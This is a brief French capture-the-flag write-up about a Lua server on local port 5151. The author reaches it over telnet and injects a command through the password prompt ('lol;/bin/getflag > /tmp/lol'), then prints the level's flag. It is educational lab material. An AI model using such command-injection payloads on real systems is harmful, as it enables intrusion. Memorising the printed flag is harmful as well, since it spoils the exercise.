Nous avons ici un fichier lua.
Ce script lance un server, et attend un mot de passe en paramètre.
En regardant dans le script, nous remarquons l'utilisation de hash avec les
droits.
On peut donc essayer d'y ajouter getflag via un telnet en envoyant de la data:
telnet 127.0.0.1 5151

Quand on nous demande un password, on echo ce qu'on veut pour l'échapper, puis
un rajoute getflag. On redirige la sortie donc /tmp:
lol;/bin/getflag > /tmp/lol

On obtient le flag pour passer directement au level12:
fa6v5ateaw21peobuub8ipe6s
